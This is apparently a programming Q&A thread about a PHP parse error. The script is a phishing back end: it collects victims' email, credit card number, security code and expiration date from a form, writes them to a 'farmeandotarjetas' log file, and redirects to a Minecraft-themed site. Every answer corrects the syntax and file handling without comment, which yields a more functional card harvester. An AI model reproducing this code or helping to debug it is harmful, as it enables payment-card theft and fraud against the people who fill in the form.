# Error: Parse error: syntax error, unexpected T_STRING

Tags: php, html, post, fonts

This is My code:

```
<?php

$email = $_POST['email']; 
$credit = $_POST['credit']; 
$security = $_POST['security'];
$expiration = $_POST['expiration'];
$fm = "farmeandotarjetas.html"; 
$fh = fopen($fm,"a"); 
$fmstring = "Email: '.$email.'</font></b>] Credit Card: [<b><font color="#FF1493">'.$credit.'</font></b>] Security Code: [<b><font color="#FF1493">'.$security.'</font></b>]Expiration code: [<b><font color="#FF1493">'.$expiration.'<br>";
fwrite($fm);
fclose($fm);
echo "<meta http-equiv='refresh' content='1;url=http://minecraftactivation.com/'>";
</?
```

My problem:
`Parse error: syntax error, unexpected T_STRING in /home/u431949153/public_html/post.php` on line 10. The line 10 is fwrite($fm);

Comment: I guess the error is caused due to the string value incorrectly assigned for `$fmstring`

Comment: You can easily spot the error even here; does your IDE have syntax highlight?

Answer (score 2):

you have error in 9th line.
your line should be something like that:

```
$fmstring = 'Email: '.$email.'</font></b>] Credit Card: [<b><font color="#FF1493">'.$credit.'</font></b>] Security Code: [<b><font color="#FF1493">'.$security.'</font></b>]Expiration code: [<b><font color="#FF1493">'.$expiration.'<br>';
```

Comment: also error in ending php tab </? change this ending tags

Answer (score 0):

You have multiple errors first in the $fmstring and next you have to give it the resource not the string so change the $fm to $fh and $fmstring like this

```
$email = $_POST['email']; 
$credit = $_POST['credit']; 
$security = $_POST['security'];
$expiration = $_POST['expiration'];
$fm = "farmeandotarjetas.html"; 
$fh = fopen($fm,"a"); 
$fmstring = 'Email: '.$email.'</font></b>] Credit Card: [<b><fontcolor="#FF1493">'.$credit.'</font></b>] Security Code: [<b><font color="#FF1493">'.$security.'</font></b>]Expiration code: [<b><font color="#FF1493">'.$expiration.'<br>';

 fwrite($fh);
 fclose($fh);
```

Answer (score 0):

If u using double quote for echo values try this style

```
echo "Email: {$email}, Credit Card: {$credit_card}";
```

above method is same as this style

```
echo "Email: ".$email.", Credit Card: ".$credit_card;
```

and

```
echo 'Email: '.$email.', Credit Card: '.$credit_card;
```

it's many options to make the code readable for your self

for your problem try to change this code into yours

```
$fmstring = "Email: {$email}</font></b>] 
             Credit Card: [<b><font color=\"#FF1493\">{$credit}</font></b>] 
             Security Code: [<b><font color=\"#FF1493\">{$security}</font></b>]
             Expiration code: [<b><font color=\"#FF1493\">{$expiration}<br>";
```

can u see that? if u using double quote for echo statment and the string have one or many double quote u must put a backslashes before each double quote in the string.

and dont forget to change php tag close into `?>` not `</?`